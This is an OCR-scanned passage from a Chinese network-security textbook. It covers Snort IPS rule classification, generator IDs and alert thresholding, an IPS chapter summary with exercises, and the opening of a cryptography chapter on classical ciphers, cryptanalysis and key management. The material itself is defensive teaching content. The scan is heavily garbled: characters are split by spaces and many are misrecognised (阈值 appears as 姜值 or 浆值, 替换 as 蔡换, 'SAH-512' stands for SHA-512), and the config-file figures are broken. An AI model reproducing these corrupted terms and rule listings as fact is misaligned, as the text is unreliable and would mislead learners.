classification: bad— unknown; reference: bugtraq, 2490; rev:1;) 

5) 类 别 classification 

按照 检测 的 活动 类 型 为 规则 定义 所 属 类 别 ,指定 在 classification. config 中 定义 的 类 
别 缩 写 。 每 种 类 别 的 定义 格式 如 图 8-31 所 示 ,示例 规则 如 下 : 
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alert tcp any any 一 > $EXTERNAL_NET 80 (msg:"test 1"; content:"test"; classification: 
bad — unknown; reference: bugtraq, 2490; rev:1;) 





弄 写 簿 式 详 顷 往 壕 
onfig classification: not-suspicious, Hot Suspicious Traffic, 3 优先 级 
onfig classification: unknown, Unknown Traffic, 3 
onfig classification: bad-unknown, Potentially Bad Traffic，2 
onfig classification: attenpted-recon, Atteapted Infornation Leak, 2 
onfig classification: successful-recon-linited, Infornation Leak, 2 
onfig classification: successful-recon-largescale, Large Scale Infomati 


classification: attenpted-dos, Attenpted Denial of Service, 2 
classification: successful-dos, Denial of Service,2 
classification: attempted-user, Attenpted User Privilege Gain,1 

: unsuccessful-user, Unsuccessful User Privilege Gain, 
classification: successful-user, Successful User Privilege Gain,1 
classification: attempted-adnin, Attenpted Adninistrator Privileg 


onfig classification: successful-adnin, Successful Adninistrator Privileg: 





图 8-31 classification. config 配置 文件 示例 
6) 生成 器 标识 符 GID 


示 该 规则 由 哪个 组 件 负 责 解 析 和 产生 报警 ,具体 映射 关系 在 gen-msg. map 中 定 
义 , 如 图 8-32 所 示 ,示例 规则 如 下 : 


alert ( msg: "ARPSPOOF_UNICAST ARP REQUEST"; sid: 1; gid: 112; rev: 1; metadata: rule- type 
preproc; classtype:protocol - command — decode; ) 











GENERATORS —> nsg map 
Fornat: generatorid || alertid || MSG 

aid sid 
| snort general alert 
| tag: Tagged Packet 
| snort dynanic alert 
spp_portscan: Portscan Detected 
spp_portscan: Portscan Status 
spp_portscan: Portscan Ended 
spp_ninfrag: ninfrag alert 
http_decode: Unicode Attack 
http_decode: COI NULL Byte Attack 
http_decode: large method attenpted 
http_decode: nissing uri 
http_decode: double encoding detecte: 








I 
| 
| 
| 
| 
| 
| 
| 
| 





8-32 gen-msg. map 配置 文件 示例 


7) 性 能 调 优 配置 

Snort 支持 4 种 方式 对 规则 进行 性 能 调节 : 

(1) limit: 在 指定 时 间 间 隔 内 , 当 规 则 匹配 的 次 数 达 到 某 个 阔 值 时 , 才 产 生 一 条 报 
警 ,并且 在 该 时 间 间 隔 的 剩余 时 间 内 忽略 剩余 的 警报 。 

(2) threshold: 在 指定 时 间 间 隔 内 ,每 当 规则 匹配 的 次 数 达到 某 个 姜 值 时 , 均 产 生 
报警 。 

(3) both: 每 当 规则 匹配 的 次 数 达 到 某 个 浆 值 时 ,产生 一 条 报警 ,然后 忽略 指定 时 间 
间隔 内 的 其 他 报警 。 
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(4) suppress: 排除 指定 规则 的 报警 ,或 者 排除 指定 规则 在 某 些 具体 主机 上 的 报警 。 

性 能 调 优 配置 必须 在 配置 文件 *threshold. conf" 中 定义 ,具体 指令 的 语法 和 示例 
如 下 : 

event_filter gen_id gen - id, sig_id sig - id, type {limit|threshold|both}, track {by_src| 

by_dst}, count n, seconds m 

// 每 60s, 只 要 规则 1851 被 匹配 ,对 每 个 源 IP, 只 打印 一 次 报警 

event filter gen id 1, sig id 1851, type limit, track by src, count 1, seconds 60 

// 每 60s, 只 要 规则 100 被 匹配 ,对 每 个 源 IP, 每 匹配 3 次 才 打印 一 次 报警 

event_filter gen_id 1, sig_id 100, type threshold, track by_src, count 3, seconds 60 

// 对 所 有 的 Snort 检测 引擎 规则 , 对 每 个 源 IP, 每 60s 只 打印 一 次 报警 

event filter gen id1, sig id 0, type limit, track by_src, count 1, seconds 60 

suppress gen_id 1，sig_id 1852 // 不 产生 该 规则 的 有 关 报 警 

// 当 规则 匹配 源 地 址 IP 是 10.1.1.54 时 ,不 报警 

suppress gen_id 1, sig_id 1852, track by_src, ip 10.1.1.54 

// 当 规则 匹配 目标 地 址 IP 是 10.1.1.0/24 时 ,不 报警 

suppress gen_id 1, sig_id 1852, track by dst, ip 10.1.1.0/24 


Snort 的 规则 集合 需要 单独 下 载 , 并 不 与 Snort 软件 绑 定 在 一 起 ,公开 下 载 的 Snort 
规则 集合 主要 是 社区 版 本 ?了 ,当前 版 本 是 2. 9。 


8.4 小 结 


IPS 是 一 种 主动 防御 机 制 ,是 防火 墙 之 后 的 第 二 道 曾 门 ,通常 包括 事件 生成 器 ,事件 
分 析 器 .响应 单元 和 事件 数据 库 等 组 件 。 按 照 事件 来 源 划 分 可 分 为 基于 主机 的 HIPS 和 
基于 网 络 的 NIPS ,按照 分 析 方 法 划分 可 分 为 基于 特征 的 IPS 和 基于 异常 的 IPS, 按 照 部 
署 方式 划分 可 分 为 集中 式 IPS 和 分 布 式 IPS。 

IPS 工作 过 程 分 为 信息 收集 .数据 分 析 和 结果 响应 三 部 分 。HIPS 主要 监视 网 络 连 
接 、 主 机 文件 .系统 进程 等 对 象 , 而 NIPS 主要 监视 网 络 通信 报 文 。 基 于 特征 的 IPS 从 已 
知人 侵 行为 中 提取 精确 特征 ,然后 依据 特征 库 对 收集 的 事件 进行 分 析 , 主要 方法 有 模式 匹 
配 专家 系统 和 状态 迁移 等 , 它 无 法 检测 未 知人 侵 行为 。 基 于 异常 的 IPS 建立 正常 网 络 访 
问 行为 的 模型 , 当 收 集 的 事件 与 模型 存在 较 大 差异 时 ,认为 该 事件 异常 , 它 可 以 检测 未 知 
入 侵 ,但 是 存在 较 大 的 误 报 率 , 主要 方法 有 统计 分 析 、 免 疫 技术 和 数据 挖掘 等 。 集 中 式 
IPS 把 分 析 和 响应 组 件 放置 在 单一 主机 ,适合 小 型 网 络 , 用 于 大 型 网 络 时 ,该 主机 将 成 为 
瓶颈 。 分 布 式 IPS 采用 分 层 思想 ,设计 多 层 代理 机 制 , 可 实现 动态 配置 ,是 IPS 的 主要 部 
署 方 式 , 但 是 实现 相对 复杂 。 

完整 性 分 析 是 一 种 事后 分 析 方法 ,基于 哈 希 摘 要 技术 ,用 于 检测 某 些 文件 和 对 象 是 否 
被 更 改 , 是 IPS 的 必要 补充 手段 。 相 应 的 开源 工具 主要 有 Tripwire 和 AIDE, 在 
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Windows 下 可 以 使 用 sigcheck 小 工具 配合 命令 行 脚 本 实现 完整 性 分 析 。 

HIPS 的 主要 作用 是 抵御 恶意 代码 和 保护 主机 资源 ,其 工作 流程 如 下 : 

(1) 截获 所 有 对 主机 资源 的 操作 请 求 ; 

(2) 确定 操作 对 象 类 型 和 操作 的 参数 信息 ; 

(3) 结合 当前 系统 状态 和 访问 控制 策略 做 出 判定 ; 

(4) 执行 决策 。 

开源 HIPS 的 代表 是 OSSEC, 它 支持 Windows、Linux 和 各 类 UNIX 操作 系统 ,采用 
客户 /服务 器 架构 ,主要 包括 日 志 分 析 、 完 整 性 检测 、Root kits 检测 等 ,但 是 不 支持 截获 系 
统 调用 。Windows 下 主要 监视 事件 查看 器 中 记录 的 事件 以 及 指定 的 注册 表 项 。 

NIPS 主要 检测 网 络 通信 报 文 ,工作 流 程 包括 信息 捕获 、 信 息 实时 分 析 、 入 侵 阻 止 、 
报警 登记 和 事后 分 析 等 。NIPS 产品 较 多 ,开源 NIPS 软件 主要 有 Snort、 Suricata 和 
Bro。 

Snort 是 一 款 经 典 的 基于 特征 检测 的 NIPS, 包 括 报 文 捕获 和 解析 模块 、 检 测 引擎 模 
块 和 日 志 与 报警 模块 。 它 有 三 种 运行 模式 : 噢 探 器 模式 .记录 器 模式 和 NIPS 模式 ,内 置 
强大 的 预 处 理 器 和 协议 解码 器 ,有 效 解析 各 种 常见 应 用 层 协议 ,可 以 检测 ARP 攻击 、 端 
口 扫 描 等 常见 攻击 前 奏 。Snort 的 配置 主要 通过 文件 snort. conf 实现 ,配置 选项 十 分 丰 
富 , 支 持 配置 IP 变量 .端口 变量 .通用 变量 解码 器 参数 、 预 处 理 器 参数 、 输 出 插件 和 规则 
库 的 选取 等 操作 。 

Snort 的 规则 描述 语言 极其 强大 ,支持 的 规则 选项 多 达 上 百 条 ,包括 协议 头 部 .协议 
数据 、 报 文 状态 、 响 应 机 制 , 性 能 调节 、 上 下 文 信息 等 设置 ,用 户 儿 乎 可 以 针对 具体 报 文 编 
写 能 想到 的 任何 匹配 规则 。 


习 题 


8-1 简 述 IPS 和 有 状态 包 过 滤 防 火 墙 主要 有 哪些 功能 差异 。 

8-2 简 述 NIPS 和 HIPS 的 主要 有 哪些 功能 差异 。 

8-3 简 述 异常 分 析 和 特征 检测 的 原理 .方法 和 区 别 。 

8-4 简 述 工作 在 探测 模式 的 NIPS 有 哪些 捕获 报 文 的 方法 。Snort NIPS 如 何 实现 
主动 终止 异常 连接 或 主动 拒绝 UDP 攻击 报 文 ? 

8-5 特征 检测 如 何 解决 攻击 者 将 特征 分 散在 多 个 TCP 报 文 段 或 UDP 数据 报 的 情 
况 ? Snort NIPS 如 何 实现 这 项 功能 ? 

8-6 简 述 分 布 式 IPS 中 ,HIPS 和 NIPS 组 件 的 通用 部 署 方式 。 对 于 如 图 8-33 所 示 
的 拓扑 , 试 给 出 一 个 分 布 式 IPS 的 部 署 方案 。 要 求 ， 

(1) 能 够 检测 感染 病毒 的 终端 大 量 发 送 邮件 传播 病毒 的 过 程 ; 

(2) 能 够 检测 针对 服务 器 的 弱 口 令 攻击 过 程 ; 

(3) 能 够 检测 针对 服务 器 的 远程 木马 控制 功能 。 
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图 8-33 拓扑 图 


8-7 某 Linux 主机 管理 员 想 使 用 Tripwire 每 隔 1h 只 监控 /usr/bin 和 /bin 目录 的 
文件 变化 情况 ,并 自动 生成 报告 ,他 应 该 如 何 配 置 以 达到 目的 ? 

8-8 实验 配置 两 个 完整 性 分 析 工 具 Tripwire 和 AIDE ,然后 简 述 它们 的 功能 差别 。 

8-9 实验 配置 OSSEC, 使 用 Linux 主机 做 服务 器 , Windows 7 主机 做 客户 端 ,尝试 
实时 监控 Windows 日 志和 开机 启动 注册 表 项 的 变化 , 列 出 实验 结果 ,说 明 OSSEC 是 否 
支持 日 志 实 时 监控 和 注册 表 项 的 实时 监控 。 

8-10 某 TCP 攻击 报 文 序列 (注意 flow 选项 ) 中 存在 如 下 特征 : 

(1) 内 容 存在 顺序 模式 : 0xaabbccdd*…“abcde”…“\xffshe”; 

(2) 该 模式 位 于 数据 部 分 初始 10 字 节 之 后 ; 

(3) 报 文 TTL 值 小 于 64; 

(4) 报 文 数据 部 分 不 超过 100 字 节 ， 

(5) 目标 网 络 是 192. 168. 2. 0/24 ,目标 端口 为 SMTP 服务 端口 。 

试 编写 能 够 精确 检测 该 模式 的 Snort 规则 ,报警 消息 为 “a zero day exploit 
detected”。 如 果 要 求 对 该 类 规则 触发 的 报警 ,每 分 钟 至 多 报警 两 次 ,如 何 改进 该 规则 ? 
如 果 该 报 文 由 主机 192. 168. 2. 100 发 出 , 则 不 产生 报警 ,如 何 改进 该 规则 ? 
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学 习 要 求 : 

。 了 解密 码 编码 学 和 密码 分 析 学 的 基本 定义 。 

。 掌握 对 称 加 密 的 基本 原理 ,掌握 DES 算法 的 实现 过 程 。 
掌握 公 钥 加 密 的 基本 原理 ,掌握 RSA 算法 的 实现 过 程 。 
掌握 散 列 函数 的 基本 原理 ,掌握 SAH-512 算法 的 实现 过 程 。 
理解 密 钥 分 配 技术 的 基本 原理 。 

理解 消息 认证 码 的 基本 原理 ,理解 HMAC 算法 的 实现 过 程 。 
掌握 数字 签名 技术 的 基本 原理 。 

理解 身份 认证 技术 的 基本 原理 。 

了 解 PKI 的 基本 架构 ,掌握 GnuPG 工具 的 使 用 方法 。 


网 络 安全 的 三 个 核心 目标 是 保密 性 、 完 整 性 和 不 可 抵赖 性 ,它们 都 可 以 利用 密码 技术 
实现 ,因此 密码 理论 和 技术 是 保障 网 络 安全 的 基础 和 核心 手段 。 密 码 技术 包括 加 /解密 算 
法 ,密码 分 析 , 安 全 协议 、 密 钥 管 理 、 身 份 认证 和 数字 签名 等 。 


9.1 概 述 


密码 学 (Cryptology) 是 一 门 具 有 悠久 历史 的 学 科 , 它 是 研究 数据 加 密 、 解 密 和 加 密 变 
换 的 科学 ,涉及 数学 、 计 算 机 科学 及 电子 与 通信 等 学 科 。 加 密 是 研究 编写 密码 系统 ,把 数 
据 和 信息 转换 为 不 可 识别 的 密 文 的 过 程 ; 而 解密 则 是 研究 密码 系统 的 加 密 途 径 , 恢 复数 
据 和 信息 本 来 面目 的 过 程 。 

通信 的 双方 分 别称 为 发 送 方 与 接收 方 。 发 送 方 发 送 消 息 给 接收 方 时 ,需要 使 用 某 种 
方法 保证 该 消息 安全 准确 地 到 达 接 收 方 ,并 且 确 保 该 消息 没有 泄露 ,这 里 的 消息 称 为 明文 
(plain text) ,使 用 的 方法 称 为 加 密 (encryption) ,加 密 后 的 消息 称 为 密 文 (cipher text) ,将 
密 文 恢复 为 明文 的 过 程 称 为 解密 (decryption) ,攻击 者 试图 在 不 知道 任何 加 密 细 节 的 前 提 
下 恢复 明文 的 过 程 称 为 密码 分 析 , 俗 称 “破译 (crack) 。 

密码 学 的 历史 可 以 分 为 三 个 阶段 。 

1. 几 千年 前 到 1949 年 

这 一 时 期 的 密码 学 还 不 是 一 门 真正 的 科学 ,而 是 一 门 艺术 。 密 码 学 专家 通常 凭借 自 
己 的 直觉 进行 密码 设计 ,对 密码 的 分 析 往 往 也 是 基于 直觉 ,使 用 的 加 密 方法 称 为 古典 加 密 
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技术 ,主要 包括 置换 密码 ,替换 密码 、 单 表 替 换 、 一 次 一 密 , 转 轮机 、 电 码 本 等 。 虽 然 这 些 技 
术 在 现代 密码 分 析 技 术 面前 已 经 可 以 被 轻易 破解 ,但 是 它们 的 思想 在 现代 密码 的 算法 设 
计 中 还 有 广泛 应 用 。 

1) 置换 密码 

根据 一 定 的 规则 重新 安排 明文 字母 ,常用 规则 包括 列 置 换 和 周期 置换 。 所 谓 列 置 换 ， 
就 是 将 明文 排列 成 多 行 , 每 行 长 度 与 密码 的 长 度 一 致 ,然后 一 列 一 列 地 输出 密 文 。 设 明文 
为 “heisgood”, 密 码 长 度 为 4, 那 么 列 置 换 方法 如 下 :; 

3421 

heis 

good 输出 的 密 文 为 : sdiohgeo 

周期 置换 方法 需要 设置 周期 置换 函数 /(Gi),i 一 1,2,3,4, 置 换 时 将 明文 分 为 4 个 一 组 
进行 周期 置换 

f(1) =3,f(2) = 4,f(3) = 2,f(4) = 1, 输 出 的 密 文 为 isehodog 

heis- iseh 

good- odog 

单纯 地 置换 密码 会 导致 密 文中 的 字母 频率 特征 与 原始 明文 相同 ,因而 易于 被 识破 , 因 
此 常常 采用 多 步 置 换 密 码 ,提升 密码 分 析 的 复杂 度 。 

2) 替换 密码 

将 明文 中 的 每 一 个 字符 替换 成 密 文中 的 另 一 个 字符 ,接收 者 对 密 文 进行 着 蔡 换 即 可 
恢复 出 明文 ,两 种 经 典 蔡 换 密码 方式 是 恺 撒 密 码 和 单 表 替 换 。 

恺 撤 密 码 是 已 知 最 早 的 替换 密码 方式 , 它 非常 简单 ,就 是 对 字母 表 中 的 每 个 字母 用 其 
后 的 第 N 个 字母 来 代替 , 即 “a - d,b-e,c-f,y -a,z-c” 等 ,这 里 NN 可 以 取 1~25。 因 此 
恺 撤 密 码 可 以 很 容易 通过 穷 举 这 25 种 情况 破解 。 恺 撒 算 法 可 以 形式 化 描述 为 对 每 个 明 
文字 母 p 和 密 文 c, 加 /解密 算法 如 下 : 

c= encryption(N,p) = (p+N) mod 26 

p= decryption(N,c) = (c— N) mod 26 

恺 撤 密码 只 有 25 种 密码 ,如果 允 许 任意 替换 ,那么 可 能 的 密码 即 有 26! 或 者 4 * 10” 
种 可 能 ,这 就 是 单 表 奉 换 。 它 将 明文 和 密 文 的 映射 方式 使 用 一 个 自 定义 的 字母 表 表 
示 ,攻击 者 很 难 通过 穷 举 法 找 出 这 张 字母 表 。 但 是 攻击 者 可 以 利用 语言 的 规律 进行 攻 
击 , 例 如 ,可 以 比较 常用 英文 字母 的 使 用 频率 ,从 而 猜测 密 文 字母 与 实际 明文 字母 的 对 
应 关系 。 

3) 一 次 一 密 

使 用 与 消息 长 度 相同 并 且 每 次 都 不 重复 的 随机 密 钥 对 消息 进行 加 密 , 每 个 密 钥 只 用 
一 次 然后 丢弃 ,理想 的 一 次 一 密 不 可 破解 ,因为 它 产生 的 随机 输出 与 明文 没有 任何 统计 关 
系 。 一 次 一 密 的 安全 性 完全 取决 于 密 钥 的 随机 性 ,但 是 ,要 实际 大 规模 产生 完全 随机 的 密 
钥 十 分 困难 。 密 钥 的 分 配 和 管理 也 很 困难 ,因为 双方 的 密 钥 需要 同步 ,难以 保证 密 钥 分 配 
的 安全 性 。 
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4) 轮转 机 

1920 年 ,人 们 发 明了 基于 转 轮 概 念 的 机 械 加 密 设备 用 于 自动 处 理 加 密 , 实 现 多 表 替 
换 密码 。 它 包含 一 个 键盘 和 多 个 转 轮 ,每 个 转 轮 相当 于 一 个 单 表 替换 ,而 且 这 张 表 可 以 随 
着 转 轮转 动 而 变化 。 这 样 , 当 存在 多 个 转 轮 时 ,将 转 轮转 动 至 不 同位 置 就 可 以 很 容易 地 设 
置 多 张 蔡 换 表 ,使 得 密 文 很 难 被 破解 ,DES 算法 就 借鉴 了 转 轮 机 的 思想 。 

5) 电码 本 

电码 本 就 像 是 一 本 字典 ,包含 单词 和 相应 的 码 字 。 电 码 本 密码 属于 蔡 换 密码 ,但 是 它 
是 对 整个 单词 或 者 短语 进行 蔡 换 , 相 比 单 表 蔡 换 更 为 复杂 。 电 码 本 与 现代 分 组 加 密 有 一 
定 关联 ,每 个 分 组 密 钥 都 可 以 确定 一 部 不 同 的 电码 本 。 

2. 1949 一 1975 年 

1949 年 ,香农 发 表 ( 保 密 系统 的 通信 理论 ), 从 此 密码 学 成 为 一 门 独立 科学 。 计 算 机 
的 出 现 使 得 基于 复杂 计算 的 密码 成 为 可 能 ,数据 安全 基于 密 钥 而 不 是 算法 的 保密 。 

3. 1976 年 至 今 

1976 年 ,Diffie 和 Hellman 发 表 (密码 学 的 新 方向 》, 证 明 发 送 端 和 接收 端 不 需要 传输 
密 钥 即 可 实现 保密 通信 ,从 而 开创 公 钥 密码 的 新 纪元 。1977 年 ,美国 的 数据 加 密 标 准 
DES 公布 ,从 此 密码 学 才 开始 充分 发 挥 它 的 商用 和 社会 价值 。 

密码 学 发 展 至 今 ,有 两 大 类 密码 体制 ,一 类 为 对 称 加 密 体 制 , 另 一 类 是 非 对 称 加 密 体 
制 (或 公 钥 加 密 )。 一 个 密码 体制 由 算法 和 密 钥 两 个 基本 组 件 构成 ,对 于 古典 加 密 技 术 , 其 
安全 性 依赖 于 算法 ; 而 对 于 现代 加 密 技术 ,算法 可 以 公开 ,其 安全 性 完全 依赖 于 密 钥 , 称 
为 基于 密 钥 的 算法 。 

用 于 加 密 的 各 种 算法 构成 的 研究 领域 称 为 密码 编码 学 ,密码 分 析 则 研究 如 何在 不 知 
道 任何 加 密 细节 的 条 件 下 解密 消息 的 技术 ,密码 编码 学 和 和 密码 分 析 学 统称 密码 学 。 


9.1.1 密码 编码 学 


密码 编码 学 的 主要 任务 是 研究 安全 、 高 效 的 信息 加 密 算法 和 信息 认证 算法 的 设计 理 
论 和 技术 ,密码 系统 设计 通常 的 基本 要 求 是 : 

(1) 知道 密 钥 K 时 ,加 密 过 程 Encryption 必须 容易 计算 ; 

(2) 知道 密 钥 K 时 ,解密 过 程 Decryption 必须 容易 计算 ; 

(3) 不 知道 密 钥 K 时 ,由 密 文 C=E(P) 不 容易 推导 出 明文 P。 

密码 系统 设计 的 原则 是 对 通信 双方 来 说 ,实现 加 密 和 人 解密 变换 很 容易 ,而 对 密码 分 析 
人 员 来 说 ,由 密 文 推导 出 明文 十 分 困难 。 

密码 编码 学 系统 具有 三 个 独立 特征 : 

(1) 转换 明文 为 密 文 的 运算 类 型 。 所 有 的 加 密 算法 都 基于 两 种 传统 加 密 方式 : 置换 
和 蔡 换 ,并 且 所 有 的 运算 都 可 逆 , 通 常 都 使 用 多 层 蔡 换 和 置换 。 

(2) 所 用 的 密 钥 。 如 果 发 送 方 和 接收 方 使 用 相同 的 密 钥 ,这 种 加 密 算法 称 为 对 称 密 
钥 、 单 钥 密 钥 ; 如 果 双 方 使 用 不 同 的 密 钥 , 就 称 为 非 对 称 密 钥 、 公 钥 密 钥 。 

(3) 处 理 明文 的 方式 。 分 组 加 密 每 次 处 理 输入 的 一 组 元 素 , 相 应 地 输出 一 组 元 素 ; 
流 加 密 则 是 连续 地 处 理 输 入 元 素 ,每 次 输出 一 个 元 素 。 


se 





深入 理解 信息 安全 防护 体系 





Ne/ 网 络 攻防 技术 与 实战 


9.1.2 密码 分 析 学 


密码 分 析 指 试图 找 出 明文 或 密 钥 的 工作 ,目标 通常 是 恢复 使 用 的 密 钥 。 攻 击 对 称 加 
密 体制 可 以 采取 穷 举 攻击 , 即 对 密 文 尝试 所 有 可 能 的 密 钥 , 直 到 找到 正确 的 明文 。 随 着 具 
有 超 强 计算 能 力 的 超级 计算 机 的 诞生 , 穷 举 DES 算法 的 56 位 密 钥 空间 的 时 间 只 需要 几 
个 小 时 ,但 是 对 于 密 钥 长 度 为 128、192、256 位 的 算法 , 穷 举 法 目前 还 是 不 大 实际 ,因此 还 
是 需要 依靠 密码 分 析 技 术 来 推导 密 钥 。 密 码 分 析 技 术 包括 唯 密 文 分 析 、` 已 知 明文 攻击 、 选 
择 明 文 攻击 .选择 密 文 攻击 和 选择 文本 攻击 五 类 ,如 表 9-1 所 列 。 


表 9-1 密码 分 析 类 型 























攻击 类 天 密码 分 析 者 已 知 的 信息 
礁 密 文 攻击 加 密 算 法 . 待 解 密 的 密 文 
已 知 明文 攻击 加 密 算 法 . 待 解 密 的 密 文 .多 不 成 对 的 明文 和 密 文 
选择 明文 攻击 加 密 算 法 . 待 解 密 的 密 文 任 意 选择 的 明文 和 密 文 对 
选择 密 文 攻击 加 密 算法 \ 待 解密 的 密 文 \ 有 目的 选择 的 一 些 密 文 和 对 应 的 明文 
加 密 算 法 . 待 解 密 的 密 文 .任意 选择 的 明文 和 密 文 .有 目的 选择 的 一 些 密 
光 皇 兴 丰 可 内 文 和 对 应 的 明文 
1. 唯 密 文 攻击 


密码 分 析 者 有 一 些 消息 的 密 文 ,这 些 消 息 都 使 用 相同 算法 加 密 ,密码 分 析 者 的 任务 是 
恢复 尽 可 能 多 的 明文 ,或 者 最 好 能 推算 出 加 密 消息 的 密 钥 ,以 便 采用 相同 的 密 钥 解密 其 他 
被 加 密 的 信息 。 即 已 知 C= Ei(P1) ,Cs 二 Ei(Ps),…,Ci 二 E,(Pi), 推 导出 P,P,,…， 
P; ,或 者 密 钥 , 或 者 找 一 个 算法 从 Citi 二 Ei(Piri) 推 导出 Pi+1。 唯 密 文 攻击 最 容易 防 
御 , 因 为 攻击 者 拥有 的 信息 量 最 小 。 

2. 已 知 明 文 攻击 

密码 分 析 者 不 仅 可 以 得 到 一 些 消息 的 密 文 ,而 且 还 知道 这 些 消息 对 应 的 明文 。 分 析 
者 的 任务 是 用 加 密 消息 推导 出 密 钥 或 一 个 算法 ,用 该 算法 可 以 对 其 他 密 文 进行 解密 。 即 
已 知 Pi,C1 二 Ei(P1),P;,C, 二 Ei(P:),P;,C; 一 E,(P;) 推 导出 密 钥 ,或 者 从 Ci+ 二 
E.(Pi+1) 推 导出 Pi+1 的 算法 。 

与 已 知 明文 攻击 相关 的 方法 是 可 能 词 攻击 , 当 攻 击 者 处 理 某 些 特定 信息 时 ,他 可 能 知 
道 其 中 的 部 分 内 容 ,例如 对 于 某 个 完整 的 数据 库 文件 ,他 可 能 知道 放 在 文件 最 前 面 的 是 一 
些 关 键 词 。 

3. 选择 明文 攻击 

密码 分 析 者 不 仅 可 以 得 到 一 些 消息 的 密 文 和 相应 明文 ,而 且 还 可 以 选择 被 加 密 的 明 
文 ,也 就 是 说 分 析 者 可 以 在 发 送 的 消息 中 插入 新 的 信息 。 这 种 方式 比 已 知 明文 攻击 更 有 
效 , 因 为 分 析 者 可 以 选择 特定 的 明文 块 去 加 密 .他 会 选择 那些 最 有 可 能 恢复 密 钥 的 数据 。 
分 析 者 的 任务 是 推导 出 密 钥 或 一 个 算法 ,用 该 算法 可 以 对 其 他 密 文 进行 解密 。 即 已 知 
Pi ,Ci 一 及 (P),P: ,C=E,(P,),P; .C=E,(P;), 其 中 P,P,,…,P; 可 以 由 分 析 者 选择 。 

选择 密 文 和 选择 文本 攻击 在 密码 分 析 中 较 少 用 到 ,但 是 仍然 是 两 种 可 能 的 攻击 方法 。 

一 个 加 密 体制 称 为 理论 安全 ,如 果 无 论 有 和 多少 已 知 密 文 , 都 不 足以 唯一 确定 密 文 所 对 
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应 的 明文 ,也 就 是 说 无 论 花 多 长 时 间 , 分 析 者 都 无 法 将 密 文 解密 。 除 了 一 次 一 密 ,所 有 的 
加 密 算法 都 不 是 理论 安全 的 。 一 个 加 密 体制 称 为 计算 安全 ,应 同时 满足 : 破解 密 钥 的 
代价 超出 密 文 信息 的 价值 ; 四 破解 密 钥 的 时 间 超 出 密 文 的 有 效 生命 周 期 。 


9.1.3 密 钥 管 理 


虽然 加 密 算 法 对 密码 系统 的 安全 性 有 决定 性 作用 ,但 是 很 多 时 候 ,一 个 密码 系统 被 攻 
破 往往 是 由 于 密 钥 管理 不 当 造 成 。 因 为 密码 系统 的 安全 性 完全 取决 于 密 钥 的 安全 性 , 密 
钥 管 理 是 密码 系统 的 重要 组 成 部 分 。 密 钥 管 理 相当 复杂 , 既 有 技术 问题 ,也 有 管理 问题 ， 
但 是 它 往往 是 人 们 最 容易 忽视 的 地 方 。 

密 钥 管理 ?包括 密 钥 的 生成 、 装 入 、 存 储备 份 .分 配 、 更 新 .吊销 、 销 毁 等 内 容 ,其 中 分 
配 和 存储 最 为 复杂 。 

(1) 密 钥 生成 。 它 是 密 钥 管理 的 首要 环节 ,一 般 使 用 密 钥 生成 器 , 密 钥 长 度 应 该 足够 
长 ,因为 密 钥 长 度 越 大 ,对 应 的 密 钥 空间 就 越 大 , 穷 举 攻击 的 难度 就 越 大 。 可 分 为 集中 式 
和 分 布 式 两 种 模式 ,集中 式 往往 由 可 信 的 密 钥 管理 中 心 生成 ,分 布 式 由 网 络 中 的 多 个 节点 
协商 生成 。 密 钥 生 成 可 以 在 线 实现 或 离线 实现 。 

(2) 密 钥 的 装 入 和 更 新 。 密 钥 可 通过 键盘 、 智 能 卡 等 物理 设备 和 介质 装 入 。 当 密 钥 
需要 频繁 改变 时 ,频繁 进行 新 的 密 钥 分 配 十 分 困难 。 密 钥 更 新 指 从 旧 的 密 钥 中 产生 新 的 
密 钥 ,可 以 使 用 单 向 函数 进行 更 新 密 钥 。 

(3) 密 钥 分 配 。 也 分 为 集中 式 和 分 布 式 ,集中 式 分 配 由 可 信和 密 钥 管理 中 心 给 用 户 分 
发 密 钥 ,效率 较 高 ,但 是 该 中 心 容易 成 为 性 能 瓶 开 。 分 布 式 分 配 由 多 个 服务 器 协商 分 配 ， 
提高 了 系统 的 安全 性 和 密 钥 的 可 用 性 ,同时 服务 器 之 间 可 以 互 为 备份 。 

(4) 密 钥 存 储 。 密 钥 可 以 存储 在 大 脑 中 或 智能 卡 等 物理 设备 中 ,应 该 使 用 加 密 密 铀 
的 方法 对 密 钥 进行 加 密 保 存 , 以 保证 密 钥 的 安全 性 。 

(5) 密 钥 销毁 。 密 钥 不 能 无 限期 使 用 ,使 用 时 间 越 长 ,泄露 的 机 会 就 越 大 , 当 密 钥 生 
命 周期 结束 或 者 密 钥 已 经 泄露 时 ,必须 物理 地 销毁 密 钥 。 

(6) 密 钥 帅 销 。 当 密 钥 还 在 有 效 期 内 ,但 是 因为 丢弃 或 者 其 他 原因 无 法 使 用 ,可 以 将 
它 从 密 钥 集合 中 删除 , 称 为 密 钥 吊销 。 

(7) 密 钥 备份 。 密 钥 的 备份 可 以 采用 密 钥 托管 、 秘 密 分 割 、 秘 密 共 享 等 方式 。 密 钥 托 
管 要 求 所 有 用 户 将 自己 的 密 钥 交 给 密 钥 托管 中 心 , 由 密 钥 托管 中 心 备 份 保管 密 钥 ,一 旦 用 
户 密 钥 丢 失 , 可 从 密 钥 托管 中 心 索取 该 用 户 的 密 钥 。 秘 密 分 割 把 密 钥 分 割 成 许多 碎片 ,每 
一 片 并 无 任何 意义 ,但 把 这 些 碎片 集合 在 一 块 , 密 钥 就 会 重 现 。 采 用 秘密 共享 协议 备份 密 
钥 解 决 了 两 个 问题 : 一 是 若 密 钥 偶 然 或 有 意 地 泄露 ,整个 系统 容易 受到 攻击 ; 二 是 若 密 
钥 丢 失 或 损坏 ,系统 中 的 所 有 信息 就 无 法 使 用 。 

由 于 在 密 钥 管理 中 ,需要 在 密 钥 的 分 配 和 存储 阶段 对 密 钥 本 身 进 行 加 密 , 因 此 通常 将 
密 钥 分 为 三 类 , 即 主 密 钥 、 密 钥 加 密 密 钥 和 会 话 密 钥 。 

(1) 主 密 钥 : 对 密 钥 加 密 密 钥 进 行 加 密 , 通 常 保存 在 网 络 中 心 或 者 中 心 节点 中 ,受到 
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严格 的 物理 保护 。 

(2) 密 钥 加 密 密 钥 : 在 传输 会 话 密 钥 时 ,用 来 加 密会 话 密 钥 的 密 钥 , 也 称 为 次 主 密 钥 
或 二 级 密 钥 。 各 个 节点 的 密 钥 加 密 密 钥 应 该 各 不 相同 ,但 是 会 话 双 方 在 传送 会 话 密 钥 时 
必须 拥有 相同 的 密 钥 加 密 密 钥 。 

(3) 会 话 密 钥 : 用 于 通信 双方 交换 数据 的 密 钥 ,根据 用 途 的 不 同 可 以 分 为 数据 加 密 
